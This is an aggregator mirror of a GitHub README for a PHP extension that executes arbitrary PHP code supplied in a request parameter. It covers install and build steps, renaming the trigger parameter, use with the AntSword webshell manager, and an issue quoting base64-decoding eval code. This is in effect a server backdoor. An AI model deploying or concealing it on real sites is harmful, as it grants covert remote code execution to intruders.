Light

phith0n / arbitrary-php-extension Goto Github PK

View Code? Open in Web Editor NEW

199.0 6.0 37.0 507 KB

这是一个实验性的PHP扩展，加载这个扩展后，每次请求将可以执行一段自己的PHP代码。

License: MIT License

Zephir 0.05% C 94.44% M4 0.35% Shell 0.20% C++ 3.34% Makefile 0.17% Dockerfile 1.45% PHP 0.01%

arbitrary-php-extension's Introduction

ArbitraryPHP - 任意PHP代码执行扩展

这是一个实验性的PHP扩展，加载这个扩展后，每次请求将可以执行一段自己的PHP代码。

可用于：

管理目标PHP站点
HOOK与分析HTTP执行流程
在不修改源代码的情况下控制PHP执行结果

安装

选择对应版本的PHP，下载Releases下的二进制文件安装包，解压并获得相应PHP版本的二进制文件。

执行php -i |grep extension_dir，获取扩展目录：

将二进制文件arbitraryphp.so移动到扩展目录中，并修改php.ini，开启这个扩展：

extension=arbitraryphp.so

使用

请求任意一个PHP，在参数arbitrary_php中增加任意PHP代码，即可执行：

也可以是POST请求:

使用AntSword管理：

从源码编译

你也可以自己编译扩展，首先安装如下软件：

docker

编译生成5.4~7.2版本下所有扩展：

bash builds.sh

只生成某个PHP版本的扩展：

docker run -it --rm --name uu -v /root/arbitrary-php:/app tuwen/zephir:7.2 bash /app/build-ext.sh

自定义执行参数

如果需要自定义请求参数arbitrary_php为其他值，可以修改arbitraryphp/ext/initial/pre_request.h中REQUEST_NAME的值：

void pre_request(TSRMLS_D);

#define REQUEST_NAME "please_edit_it"

再重新编译扩展即可。

支持

二进制文件仅支持在Linux下使用，Mac或Windows等操作系统，请自行编译。

LICENSE

ArbitraryPHP遵循MIT开源协议发布。

arbitrary-php-extension's People

Contributors

Stargazers

Watchers

arbitrary-php-extension's Issues

Error

/root/arbitrary-php-extension/arbitraryphp/ext/arbitraryphp.h:7:35: 致命错误：arbitraryphp/main.zep.h：没有那个文件或目录
#include "arbitraryphp/main.zep.h"
^

使用create_function替换eval的可行性

项目本身使用eval进行代码执行，能替换成为create_function吗？

本地测试create_function创建的方法，编译完成后该方法无法被zephir识别。调用发生了报错：
zep的代码：
var call = create_function("", base64_decode(_SERVER[request_name])); {call}();
调用报错：
[Thu Aug 01 11:23:21.246079 2019] [php7:error] [pid 35563] [client 192.168.32.1:51052] PHP Fatal error: Uncaught RuntimeException: Call to undefined function P1\x86zT\x7f() in [no active file]:0\nStack trace:\n#0 {main}\n thrown in [no active file] on line 0

不知道P牛有什么好的思路可以实现这个目的呢？

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.